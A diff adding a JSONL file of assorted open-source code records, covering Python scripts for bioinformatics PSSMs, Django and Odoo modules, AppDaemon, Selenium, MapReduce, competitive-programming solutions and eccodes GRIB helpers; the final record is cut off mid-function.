diff --git "a/529.jsonl" "b/529.jsonl" new file mode 100644--- /dev/null +++ "b/529.jsonl" @@ -0,0 +1,714 @@ +{"seq_id":"554689032","text":"numb = [1,4,1,64,2,128,5,4,7,31]\nprint('Trong dãy số: ')\nprint(*numb,sep=', ')\nfor i in range(len(numb)):\n if i < len(numb) - 1:\n for j in range(len(numb)):\n if i + j + 1 <= len(numb) - 1:\n total = int(numb[i]) * int(numb[i + j + 1])\n if total == 128:\n print('{} và {} tại vị trí {} và {}'.format(numb[i],numb[i + j + 1], i + 1, i + j + 2))\n else:\n j = j + 1\n","sub_path":"ProjectC4E/C4E-20/Fundamentals/Session03/128.py","file_name":"128.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"478568369","text":"with open(\"1_report_repair_input.txt\") as f:\n expenses = f.read()\n\nexpenses = expenses.split()\nexpenses = [int(expense) for expense in expenses]\n\nfor expense1 in expenses:\n for expense2 in expenses:\n for expense3 in expenses:\n if expense1 + expense2 + expense3 == 2020:\n print(expense1*expense2*expense3)\n","sub_path":"1_report_repair/1_2_report_repair.py","file_name":"1_2_report_repair.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"10152741","text":"import numpy as np\nfrom numpy import inf\n\n\n\"\"\"\nATTENTION: Use the following dictionaries to get the correct index for each\n amino acid when accessing any type of matrix or array provided as\n parameters. Further, use those indices when generating or returning\n any matrices or arrays. Failure to do so will most likely result in\n not passing the tests.\nEXAMPLE: To access the substitution frequency from alanine 'A' to proline 'P'\n in the bg_matrix use bg_matrix[AA_TO_INT['A'], AA_TO_INT['P']].\n\"\"\"\nALPHABET = 'ACDEFGHIKLMNPQRSTVWY-'\nAA_TO_INT = {aa: index for index, aa in enumerate(ALPHABET)}\nINT_TO_AA = {index: aa for index, aa in enumerate(ALPHABET)}\nGAP_INDEX = AA_TO_INT['-']\n\nALLOWED_CHARS = set(ALPHABET)\n\n\nclass MSA:\n\n def __init__(self, sequences):\n \"\"\"\n Initialize the MSA class with the provided list of sequences. Check the\n sequences for correctness. 
Pre-calculate any statistics you see fit.\n\n :param sequences: List containing the MSA sequences.\n \"\"\"\n if len(sequences) == 0:\n raise TypeError()\n\n seq_length = len(sequences[0])\n\n for seq in sequences:\n if len(seq) != seq_length:\n raise TypeError()\n if not (set(seq).issubset(ALLOWED_CHARS)):\n raise TypeError()\n\n self.sequences = sequences\n self.number_of_sequences = len(self.sequences)\n self.msa_length = seq_length\n self.primary_sequence = self.sequences[0].replace(ALPHABET[GAP_INDEX], '')\n self.calculate_sequence_weights()\n\n def calculate_sequence_weights(self):\n seqences_2D = np.array([ list(seq) for seq in self.sequences ])\n weights = np.zeros(np.shape(seqences_2D)[0], dtype=float)\n\n number_of_observed_aas = np.zeros(self.msa_length, dtype=float)\n\n for column_index in range(self.msa_length):\n observed_aas = np.unique(seqences_2D[:, column_index])\n number_of_observed_aas[column_index] = len(observed_aas)\n\n # r > 1\n if len(observed_aas) > 1:\n for aa in observed_aas:\n observation_indices = np.where(seqences_2D[:, column_index] == aa)\n\n for index in observation_indices:\n current_weight = 1 / (len(observation_indices[0]) * len(observed_aas))\n weights[index] += current_weight\n\n self.weights = weights\n self.observed_aas = np.sum(number_of_observed_aas) / self.msa_length\n\n def get_pssm(self, *, bg_matrix=None, beta=10, use_sequence_weights=False,\n redistribute_gaps=False, add_pseudocounts=False):\n \"\"\"\n Return a PSSM for the underlying MSA. Use the appropriate refinements \n according to the parameters. If no bg_matrix is specified, use uniform \n background frequencies.\n Every row in the resulting PSSM corresponds to a non-gap position in \n the primary sequence of the MSA (i.e. the first one).\n Every column in the PSSM corresponds to one of the 20 amino acids.\n Values that would be -inf must be replaced by -20 in the final PSSM.\n Before casting to dtype=numpy.int64, round all values to the nearest\n integer (do not just FLOOR all values).\n\n :param bg_matrix: Amino acid pair frequencies as numpy array (20, 20).\n Access the matrix using the indices from AA_TO_INT.\n :param beta: Beta value (float) used to weight the pseudocounts \n against the observed amino acids in the MSA.\n :param use_sequence_weights: Calculate and apply sequence weights.\n :param redistribute_gaps: Redistribute the gaps according to the \n background frequencies.\n :param add_pseudocounts: Calculate and add pseudocounts according \n to the background frequencies.\n\n :return: PSSM as numpy array of shape (L x 20, dtype=numpy.int64).\n L = ungapped length of the primary sequence.\n \"\"\"\n pssm = np.zeros((self.msa_length, 20), dtype=float)\n\n \n # 1) Calculate sequence weights\n\n weights = np.ones((len(self.sequences)), dtype=float)\n\n if use_sequence_weights:\n weights = self.weights\n\n # 2) Count (with weights) observed amino acids and gaps\n \n\n # for every aa in ALPHABET for every seq in the MSA count number of occurrences\n for seqIndex, seq in enumerate(self.sequences):\n for row in range(self.msa_length):\n for column in range(20):\n if seq[row] == ALPHABET[column]:\n pssm[row, column] += weights[seqIndex]\n \n observed_aas = self.observed_aas\n\n # 3) Redistribute gaps according to background frequencies\n\n background_frequencies = np.full((20), 0.05, dtype=float)\n substitution_matrix = np.full((20,20), 0.05, dtype=float)\n\n if bg_matrix is not None:\n substitution_matrix = bg_matrix\n for column in range(20):\n background_frequencies[column] = np.sum(bg_matrix[column])\n\n if redistribute_gaps:\n for seqIndex, seq in enumerate(self.sequences):\n for row in range(self.msa_length):\n gap_count = 0\n if seq[row] == '-':\n gap_count += weights[seqIndex]\n for column in range(20):\n pssm[row, column] += gap_count * background_frequencies[column]\n\n\n\n # 4) Add weighted pseudocounts\n if add_pseudocounts: \n pseudocounts = np.zeros((self.msa_length, 20), dtype=float)\n for row in range(self.msa_length):\n for column in range(20):\n # if pssm[row, column] == 0:\n # continue\n for j in range(20): \n pseudocounts[row, column] += pssm[row, column] / background_frequencies[column] * substitution_matrix[column][j]\n\n pssm += pseudocounts\n\n\n # 5) Normalize to relative frequencies\n\n for row in range(pssm.shape[0]):\n pssm[row,:] = pssm[row,:] / np.sum(pssm[row])\n\n # 6) Divide by background frequencies\n\n if bg_matrix is None:\n pssm = pssm / 0.05\n else:\n for column in range(20):\n pssm[:, column] = pssm[:, column] / background_frequencies[column]\n\n # 7) Calculate Log-Score\n pssm = 2 * np.log2(pssm)\n pssm[pssm == -inf] = -20\n pssm[pssm == -2e63] = -20\n\n # 8) Remove rows corresponding to gaps in the primary sequence (primary sequence = first in MSA)\n \n gap_indices_in_primary_sequence = [pos for pos, char in enumerate(self.sequences[0]) if char == '-']\n\n pssm = np.delete(pssm, gap_indices_in_primary_sequence, axis=0)\n\n pssm = np.rint(pssm).astype(np.int64)\n print(pssm[0])\n return pssm\n\n\n def get_size(self):\n \"\"\"\n Return the number of sequences in the MSA and the MSA length, i.e.\n the number of columns in the MSA. This includes gaps.\n\n :return: Tuple of two integers. First element is the number of\n sequences in the MSA, second element is the MSA length.\n \"\"\"\n return (self.number_of_sequences, self.msa_length)\n \n\n def get_primary_sequence(self):\n \"\"\"\n Return the primary sequence of the MSA. In this exercise, the primary\n sequence is always the first sequence of the MSA. 
The returned \n sequence must NOT include gap characters.\n\n :return: String containing the ungapped primary sequence.\n \"\"\"\n return self.primary_sequence\n\n\n def get_sequence_weights(self):\n \"\"\"\n Return the calculated sequence weights for all sequences in the MSA.\n The order of weights in the array must be equal to the order of the\n sequences in the MSA.\n\n :return: Numpy array (dtype=numpy.float64) containing the weights for\n all sequences in the MSA.\n \"\"\"\n return self.weights\n\n\n def get_number_of_observations(self):\n \"\"\"\n Return the estimated number of independent observations in the MSA.\n\n :return: Estimate of independent observation (dtype=numpy.float64).\n \"\"\"\n return self.observed_aas\n","sub_path":"codechecker/repos/4/collected_files/pssm/ga49vey.py","file_name":"ga49vey.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"300198137","text":"import os\nimport re\nfrom shutil import copyfile\nimport webbrowser\n\n\ndef create_movie_tiles_content(movies):\n # The HTML content for this section of the page\n content = ''\n for movie in movies:\n # Load the template for display the movies\n movie_tile_content_file = open('movie_template.html')\n movie_tile_content = movie_tile_content_file.read()\n movie_tile_content_file.close()\n\n # Append the tile for the movie with its content filled in\n content += movie_tile_content.format(\n movie_title=movie.title,\n poster_image_url=movie.poster_image_url,\n trailer_youtube_id=movie.trailer_youtube_url\n # storyline= movie.storyline\n )\n\n if not content:\n content = \"No movies were found :'(\"\n\n return content\n\n\ndef open_movies_page(movies):\n # Create or overwrite the output file\n output_file = open(os.path.join('dist', 'index.html'), 'w')\n\n # Load the template for display the movies\n main_page_content_file = open('template.html')\n main_page_content = main_page_content_file.read()\n main_page_content_file.close()\n\n # Replace the movie tiles placeholder generated content\n rendered_content = main_page_content.format(\n movie_tiles=create_movie_tiles_content(movies))\n\n # Output the file\n output_file.write(rendered_content)\n output_file.close()\n\n # Copy CSS and JS to dist folder\n copyfile('main.css', os.path.join('dist', 'main.css'))\n copyfile('main.js', os.path.join('dist', 'main.js'))\n copyfile('favicon.ico', os.path.join('dist', 'favicon.ico'))\n\n # open the output file in the browser (in a new tab, if possible)\n url = os.path.abspath(output_file.name)\n webbrowser.open('file://' + url, new=2)\n","sub_path":"fresh_tomatoes.py","file_name":"fresh_tomatoes.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"368067776","text":"import tensorflow as tf\nimport argparse\nfrom util.rsdae_data_generator import RSDAEDataGenerator\n\n\ndef load_dict(filename):\n print(\"Loading dict\", filename)\n forward = dict()\n reverse = dict()\n with open(filename, 'rb') as reader:\n for line in reader:\n line = line.decode(\"utf-8\").strip()\n idx = len(forward)\n forward[line] = idx\n reverse[idx] = line\n\n return forward, reverse\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Gather psn profiles')\n parser.add_argument('--input', required=True, help='Input file', metavar='#')\n parser.add_argument('--words', required=True, help='Word dict', metavar='#')\n 
parser.add_argument('--postags', required=True, help='POS tag dict', metavar='#')\n\n args = parser.parse_args()\n\n print(\"Initialized with settings:\")\n print(\" \", vars(args))\n\n _, reverse_words = load_dict(args.words)\n _, reverse_postags = load_dict(args.postags)\n\n print(\"Initialising data generator...\")\n data_tensors = RSDAEDataGenerator.get_data_tensor(args.input)\n iterator = data_tensors.make_one_shot_iterator()\n cur_words, cur_postags = iterator.get_next()\n print(\"Done\")\n\n with tf.Session() as sess:\n print(cur_words.eval())","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"240373349","text":"from django.urls import path\nfrom second_app.views import index,user,form_detail_view,relative\n\napp_name = 'second_app'\nurlpatterns=[\n path('index/',index,name='index'),\n path('users/',user,name='user'),\n path('form_details/',form_detail_view,name='form_details'),\n path('relative/',relative,name='relative')\n]\n\n","sub_path":"first_project/second_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"422027498","text":"import appdaemon.plugins.hass.hassapi as hass\nimport globals\n\n#\n# App which listens on the log for WARNING and ERROR and notifies via telegram\n#\n# Args:\n#\n# Release Notes\n#\n# Version 1.0:\n# Initial Version\n\n\nclass AppWatcher(hass.Hass):\n def initialize(self):\n self.notify_name = globals.get_arg(self.args, \"notify_name\")\n self.notify_message = globals.get_arg(self.args, \"notify_message\")\n self.include_log_message_in_notification = globals.get_arg(\n self.args, \"include_log_message_in_notification\"\n )\n try:\n self.exclude_apps = globals.get_arg_list(self.args, \"exclude_apps\")\n except KeyError:\n self.exclude_apps = None\n\n # App dependencies\n self.notifier = self.get_app(\"Notifier\")\n\n self.listen_log(self.log_message_callback)\n\n def log_message_callback(self, name, ts, level, message):\n if level == \"WARNING\" or level == \"ERROR\" or level == \"CRITICAL\":\n self.log(\"Correct level: {}\".format(level))\n self.log(\"name: {}\".format(name))\n if name == \"Appdaemon\":\n self.log(\"Is Appdaemon message\")\n # check if this is a warning for an app\n try:\n app_message_start_index = message.index(\":\", 11) + 2\n except ValueError:\n app_message_start_index = None\n self.log(\n \"app_message_start_index is: {}\".format(app_message_start_index)\n )\n first_space_index = message.index(\" \", 11)\n self.log(\"first_space_index is: {}\".format(first_space_index))\n if app_message_start_index is not None:\n if app_message_start_index > first_space_index:\n app_name = message[11:message.index(\":\", 11)]\n\n app_message = message[app_message_start_index:]\n\n self.notifier.notify(\n self.notify_name,\n self.notify_message.format(app_name),\n useAlexa=False,\n )\n if self.include_log_message_in_notification:\n self.notifier.notify(\n self.notify_name, app_message, useAlexa=False\n )\n\n def terminate(self):\n self.cancel_listen_log()\n","sub_path":"appWatcher/appWatcher.py","file_name":"appWatcher.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"394483180","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport math\n\nclass Mapper:\n def __init__(self):\n pass\n def __call__(self, key, value):\n value = value.replace(' ', '')\n tempArr = value.split(\"->\")\n user = tempArr[0]\n tempArr1 = tempArr[1].split(\",\")\n fndWithStatus = tempArr[1].replace(\",\", \"->\")\n yield user, (tempArr1[0]+'->'+tempArr1[1])\n yield tempArr1[0], tempArr1[1]\n\n\ndef reducer(key, values):\n ''''yield key, sum(values)'''\n prevUser = None\n tempValArr = []\n criminalRecCount = 0\n nonCriminalRecCount = 0\n for temp in values:\n tempValArr.append(temp)\n tempArr1 = []\n if '->' in temp:\n tempArr1 = temp.split('->')\n if (len(tempArr1) > 1) and (tempArr1[1] == 'yes'):\n criminalRecCount += 1\n elif (len(tempArr1) > 1) and (tempArr1[1] == 'no'):\n nonCriminalRecCount += 1\n \n totalNumberOfFnds = criminalRecCount+nonCriminalRecCount\n if ((nonCriminalRecCount != 0) and (float(float(criminalRecCount)*100/float(totalNumberOfFnds)) >= 50) and ('yes' not in tempValArr)):\n yield key, 'atrisk'\n else:\n yield key, 'not-atrisk'\n\nif __name__ == \"__main__\":\n import dumbo\n dumbo.run(Mapper, reducer, combiner=None)\n","sub_path":"assignment1/Question3/findUsersAtRisk.py","file_name":"findUsersAtRisk.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"22178120","text":"# encoding: utf-8\n# ---------------------------------------------------------------------------\n# Copyright (C) 2008-2014, IPython Development Team and Enthought, Inc.\n# Distributed under the terms of the BSD License. See COPYING.rst.\n# ---------------------------------------------------------------------------\n\n\ndef plot_dist_matrix(name, mec):\n mec.execute('_dm = %s.get_dist_matrix()' % name, 0)\n _dm = mec.zip_pull('_dm', 0)\n import pylab\n pylab.ion()\n pylab.matshow(_dm)\n pylab.colorbar()\n pylab.show()\n","sub_path":"benchmarks/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"13888233","text":"'''\nregister, user viewsets, smscode\n'''\n\nfrom rest_framework import serializers, viewsets, status\nfrom rest_framework.response import Response\nfrom rest_framework.mixins import CreateModelMixin\nfrom rest_framework.views import APIView\nfrom rest_framework.filters import SearchFilter, OrderingFilter\nfrom django.contrib.auth import get_user_model\nfrom django_filters.rest_framework import DjangoFilterBackend\n\nfrom faker import Faker\n\nfrom .serializers import UserRegSerializer, SmsSerializer, UserSerializer\nfrom .models import VerifyCode\n\nUser = get_user_model()\n\n# ViewSets define the view behavior.\nclass UserRegViewSet(viewsets.ModelViewSet):\n '''User registration'''\n queryset = User.objects.all()\n serializer_class = UserRegSerializer\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n '''User data'''\n queryset = User.objects.all()\n serializer_class = UserSerializer\n filterset_fields = ('id', 'username',)\n filter_backends = [DjangoFilterBackend, SearchFilter, OrderingFilter]\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n datas = serializer.data\n datas['name'] = datas['username']\n data = {\n 'code': 20000,\n 'data': datas\n }\n return Response(data)\n\nclass SmsCodeViewset(viewsets.ModelViewSet):\n '''\n SMS verification code\n '''\n queryset = VerifyCode.objects.all()\n serializer_class = SmsSerializer\n\n def generate_code(self):\n \"\"\"\n Generate a four-digit verification code\n \"\"\"\n faker = Faker()\n 
return faker.numerify('####')\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n #验证合法\n serializer.is_valid(raise_exception=True)\n mobile = serializer.validated_data[\"mobile\"]\n\n #生成验证码\n code = self.generate_code()\n code_record = VerifyCode(code=code, mobile=mobile)\n code_record.save()\n return Response({\n \"mobile\": mobile,\n \"code\": code\n }, status=status.HTTP_201_CREATED)\n","sub_path":"apps/user/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"578044313","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom html.parser import HTMLParser\n\nclass LinkPrinter(HTMLParser):\n \"\"\"\n Preant each link from HTML web page\n \"\"\"\n def handle_starttag(self, tag, attrs):\n if tag == \"a\":\n for name, value in attrs:\n if name == \"href\":\n print(value)\n\n# data = ...\nLinkPrinter().feed(data)\n","sub_path":"examples/xml_html_parsers/link_printer_html.py","file_name":"link_printer_html.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"41766842","text":"import os, sys\n\ndef main():\n pass\n\ndef checkSumInList(inputList, valueToFind):\n sortedList = sorted(inputList)\n minPos, maxPos = 0, len(sortedList)-1\n\n while sortedList[maxPos] > valueToFind and maxPos != minPos:\n maxPos -= 1\n\n searchValue = valueToFind - sortedList[maxPos]\n\n while maxPos > minPos:\n minPos = 0\n\n while minPos < maxPos:\n if sortedList[minPos] + sortedList[maxPos] == valueToFind:\n return True\n\n if sortedList[minPos] > searchValue:\n break\n\n minPos += 1\n maxPos -= 1\n searchValue = valueToFind - sortedList[maxPos]\n return False\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"other/sum-in-list/sumInList.py","file_name":"sumInList.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"147022481","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\ndef test_hah(driver):\n driver.get(\"http://www.python.org\")\n assert \"Python\" in driver.title\n elem = driver.find_element_by_name(\"q\")\n elem.clear()\n elem.send_keys(\"pycon\")\n elem.send_keys(Keys.RETURN)\n assert (True == True)","sub_path":"test_xd.py","file_name":"test_xd.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"555621256","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nimport datetime\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n @api.depends('partner_id')\n def _compute_check_partner_(self):\n for record in self:\n if record.partner_id.is_company:\n record.check_partner_company = True\n\n receive_ids = fields.One2many('dham.patient.recieve', 'sale_order_id', 'Receive ID')\n order_type = fields.Selection([('medicine', 'Medicine'), ('food-drink', 'Foods and Drinks'), ('none', 'None')],\n default='none', string='Order Type')\n medic_contract_id = fields.Many2one('res.partner.company.check', 'Medic Contract')\n check_partner_company = fields.Boolean('Check Partner',compute='_compute_check_partner_')\n package_ids = fields.Many2many('medic.package', 'medic_sale_order_package_package_ref', 'order_id',\n 'package_id', 'Packages', domain=[('type', '=', 'company')], 
required=1)\n\n @api.onchange('package_ids')\n def onchange_package_ids(self):\n if 'no_onchange_package' in self.env.context:\n return\n ProductObj = self.env['product.product']\n\n for record in self:\n record.invoice_line_ids = False\n if record.package_ids:\n product_list = record.package_ids.parse_multi_package()\n for product in product_list:\n product_id = ProductObj.browse(int(product[0]))\n record.order_line += record.order_line.new({\n 'name': product_id.description or product_id.name,\n 'product_id': product_id.id,\n 'product_uom_qty': 1,\n 'price_unit': product[1],\n 'product_uom': product_id.uom_id.id or False,\n 'tax_id': product_id.taxes_id.ids or [],\n })\n\n @api.onchange('order_type')\n def onchange_order_type(self):\n warehouse = self.env['hr.department'].sudo().find_ware_house(self._uid)\n if self.order_type == 'medicine':\n if warehouse:\n self.warehouse_id = warehouse.id\n self.picking_policy = 'one'\n\n if self.order_type == 'food-drink':\n if warehouse:\n self.warehouse_id = warehouse.id\n self.picking_policy = 'one'\n \n @api.multi\n def action_create_package(self):\n for record in self:\n record._action_create_package()\n return \n \n @api.model\n def _action_create_package(self):\n MedicContract = self.env['res.partner.company.check']\n if self.order_line:\n package_id = self.parse_medic_package()\n data = {\n 'name' : self.partner_id.name + ' - ' + self.name,\n 'company_id' : self.partner_id.id,\n 'package_ids': [(6, 0,[package_id.id])],\n 'sale_order_id' : self.id,\n }\n new_contract = MedicContract.create(data)\n self.write({'medic_contract_id' : new_contract.id})\n return new_contract\n \n @api.model\n def parse_medic_package(self):\n Package = self.env['medic.package']\n data = {\n 'name' : self.partner_id.name + ' - ' + self.name,\n 'type' : 'company',\n 'line_ids' : [],\n }\n for line in self.order_line:\n data['line_ids'].append(\n (0, 0, {\n 'product_id' : line.product_id.id,\n 'price' : line.price_unit,\n })\n )\n return Package.create(data)\n\nclass SaleOrderLine(models.Model):\n _inherit = 'sale.order.line'\n\n order_type = fields.Selection([('medicine', 'Medicine'), ('food-drink', 'Foods and Drinks'), ('none', 'None')],\n default='none', string='Order Type')\n\n @api.onchange('order_type')\n def onchange_order_type(self):\n if self.order_type == 'medicine':\n try:\n return {\n 'domain': {\n 'product_id': [('categ_id', '=', self.env.ref('dham_medic.product_ctg_medicines').id)]\n }\n }\n except:\n pass\n if self.order_type == 'food-drink':\n try:\n return {\n 'domain': {\n 'product_id': [('categ_id', '=', self.env.ref('dham_medic.product_ctg_food_drink').id)]\n }\n }\n except:\n pass","sub_path":"dham_medic/sale/models/medic_sale_order.py","file_name":"medic_sale_order.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"592738129","text":"\"\"\"\r\nID:ayush02\r\nLANG:PYTHON3\r\nTASK:triangles\r\n\"\"\"\r\nimport itertools\r\n\r\ndef valid_triangle(vertex, point1, point2):\r\n x_cord, y_cord = vertex\r\n if point1[0] == x_cord and point2[1] == y_cord:\r\n return True\r\n\r\ndef find_area(vertex, point1, point2):\r\n base1 = abs(point1[0] - vertex[0])\r\n height1 = abs(point2[1] - vertex[1])\r\n\r\n base2 = abs(point2[0] - vertex[0])\r\n height2 = abs(point1[1] - vertex[1])\r\n\r\n return max((base2 * height2 / 2), (base1 * height1 / 2))\r\n\r\n#Full path: C:/Users/ayush/OneDrive/Desktop/USACO/triangles/triangles.in\r\nwith open('triangles.in', 'r') as 
fin:\r\n n = int(fin.readline())\r\n coordinates = []\r\n for i in range(n):\r\n x, y = map(int, fin.readline().split())\r\n coordinates.append([x, y])\r\n\r\n#Find vertex coordinate\r\ncombinations = list(itertools.permutations(coordinates, 3))\r\n\r\nvalid = []\r\nfor combo in combinations:\r\n vertex, point1, point2 = combo\r\n if valid_triangle(vertex, point1, point2) == True:\r\n valid.append(combo)\r\n\r\narea = []\r\nfor combo in valid:\r\n vertex, point1, point2 = combo\r\n area.append(find_area(vertex, point1, point2))\r\n\r\nanswer = max(area)\r\n\r\nwith open('triangles.out', 'w') as fout:\r\n fout.write(str(int(answer * 2)))\r\n","sub_path":"triangles/triangles.py","file_name":"triangles.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"269728005","text":"# coding=utf-8\n#------------------------------------------------------------------------------\n# Name: miub_eccodes.py\n# Purpose: miub eccodes functions\n#\n# Author: Kai Muehlbauer\n#\n# Created: 23.03.2016\n# Copyright: (c) Kai Muehlbauer 2016\n# Licence: The MIT License\n#------------------------------------------------------------------------------\n# This module is far from being mature\n# may change without notice\n\nimport numpy as np\nimport eccodes as ecc\n#from collections import OrderedDict\n#from dictdiffer import diff\n\ndef get_ecc_value_from_file(filename, keyname, keyvalue):\n\n f = open(filename)\n\n gids = get_ecc_gids(filename)\n value = get_ecc_value(gids, keyname, keyvalue)\n release_ecc_gids(gids)\n\n f.close()\n\n return value\n \ndef get_ecc_value(gids, keyname, keyvalue):\n \n first = True\n \n for i, gid in enumerate(gids):\n if ecc.codes_get(gid, keyname) == keyvalue:\n if first: \n Ni = ecc.codes_get(gid, 'Ni')\n Nj = ecc.codes_get(gid, 'Nj')\n data = np.array(ecc.codes_get_values(gid))\n first = False\n else:\n data = np.dstack((data, np.array(ecc.codes_get_values(gid))))\n\n return np.squeeze(data.reshape(Ni, Nj, -1))\n\ndef get_ecc_subkey(gids, keyname, keyvalue, subkey):\n \n for i, gid in enumerate(gids):\n if ecc.grib_get(gid, keyname) == keyvalue:\n data = ecc.grib_get(gid, subkey)\n break\n \n return data\n\ndef get_ecc_gids(filename):\n f = open(filename)\n msg_count = ecc.codes_count_in_file(f)\n # TODO: this is only for grib files\n gid_list = [ecc.codes_grib_new_from_file(f) for i in range(msg_count)]\n #print(gid_list)\n f.close()\n return gid_list\n\ndef release_ecc_gids(gids):\n for gid in gids:\n ecc.codes_release(gid)\n\ndef get_ecc_data(gids):\n \n grib_dict = {}\n \n for i, gid in enumerate(gids):\n sn = ecc.grib_get(gid, 'short_name')\n if sn not in grib_dict:\n tmp = {}\n Ni = ecc.grib_get(gid, 'Ni')\n Nj = ecc.grib_get(gid, 'Nj')\n tmp['data'] = np.array(ecc.grib_get_values(gid)).reshape(Nj,Ni,1)\n tmp['shape'] = tmp['data'].shape \n grib_dict[sn] = tmp\n else:\n #print(grib_dict[sn]['data'].shape)\n #if ecc.grib_is_defined(gid, 'levels'):\n # print(ecc.grib_get(gid, 'levels'))\n Ni, Nj, Nk = grib_dict[sn]['data'].shape\n grib_dict[sn]['data'] = np.dstack((grib_dict[sn]['data'], np.array(ecc.grib_get_values(gid)).reshape(Nj,Ni)))\n grib_dict[sn]['shape'] = grib_dict[sn]['data'].shape \n \n return grib_dict\n\n\ndef get_ecc_variable(filename, key, namespace=None, skipkeys=None):\n \n gids = get_ecc_gids(filename) \n \n grib_dict = {}\n \n for i, gid in enumerate(gids):\n tmp = get_ecc_msg(gid, namespace=namespace, skipkeys=skipkeys)\n sn = tmp['shortName']\n 
print(\"Shortname:\", sn)\n for k, v in tmp.items():\n print(k, type(v))\n if sn == key:\n if sn not in grib_dict: \n grib_dict[sn] = tmp\n #else:\n # d = list(diff(grib_dict[sn], tmp))\n # print(d)\n # for key in d:\n # if key[0] == 'change':\n # try:\n # grib_dict[sn][key[1]] = np.dstack((grib_dict[sn][key[1]], tmp[key[1]]))\n # except ValueError:\n # grib_dict[sn][key[1]] = np.array([grib_dict[sn][key[1]], tmp[key[1]]])\n return grib_dict\n\ndef get_ecc_file(filename, namespace=None, skipkeys=None):\n \n gid_list = get_ecc_gids(filename)\n\n print(len(gid_list), gid_list)\n\n grib_dict = {}\n\n for i, gid in enumerate(gid_list):\n tmp = get_ecc_msg(gid, namespace=namespace, skipkeys=skipkeys)\n sn = tmp['shortName']\n if sn not in grib_dict:\n grib_dict[sn] = tmp\n else:\n d = list(diff(grib_dict[sn], tmp))\n for key in d:\n if key[0] == 'change':\n try:\n grib_dict[sn][key[1]] = np.dstack((grib_dict[sn][key[1]], tmp[key[1]]))\n except ValueError:\n grib_dict[sn][key[1]] = np.array([grib_dict[sn][key[1]], tmp[key[1]]])\n return grib_dict\n \ndef get_ecc_msg_keys(gid, namespace=None, skipkeys=None):\n \"\"\"Retrieve keys from one particular ecc message\n\n Parameters\n ----------\n gid : ecc message id\n namespace : string\n namespace to be retrieved, defaults to None (means all)\n 'ls', 'parameter', 'time', 'geography', 'vertical', 'statistics', 'mars'\n skipkeys : list of strings\n keys to be skipped, defaults to None\n possible keys: 'computed', 'coded', 'edition', 'duplicates', 'read_only', 'function'\n \n Returns\n -------\n data : list of ecc message keys \n \"\"\"\n \n # get key iterator\n iterid = ecc.codes_keys_iterator_new(gid, namespace)\n \n # Different types of keys can be skipped\n if skipkeys:\n if 'computed' in skipkeys:\n ecc.codes_skip_computed(iterid)\n if 'coded' in skipkeys:\n ecc.codes_skip_coded(iterid)\n if 'edition' in skipkeys:\n ecc.codes_skip_edition_specific(iterid)\n if 'duplicates' in skipkeys:\n ecc.codes_skip_duplicates(iterid)\n if 'read_only' in skipkeys:\n ecc.codes_skip_read_only(iterid)\n if 'function' in skipkeys: \n ecc.codes_skip_function(iterid)\n \n data = []\n # iterate over message keys\n while ecc.codes_keys_iterator_next(iterid):\n keyname = ecc.codes_keys_iterator_get_name(iterid)\n # add keyname-keyvalue-pair to output dictionary\n data.append(keyname)\n \n # release iterator\n ecc.codes_keys_iterator_delete(iterid)\n\n return data\n\n \ndef get_ecc_msg(gid, namespace=None, skipkeys=None):\n \"\"\"Read data from one particular ecc message\n\n Parameters\n ----------\n gid : ecc message id\n namespace : string\n namespace to be retrieved, defaults to None (means all)\n 'ls', 'parameter', 'time', 'geography', 'vertical', 'statistics', 'mars'\n skipkeys : list of strings\n keys to be skipped, defaults to None\n possible keys: 'computed', 'coded', 'edition', 'duplicates', 'read_only', 'function'\n \n\n Returns\n -------\n data : dictionary of ecc message contents \n \"\"\"\n \n # get key iterator\n iterid = 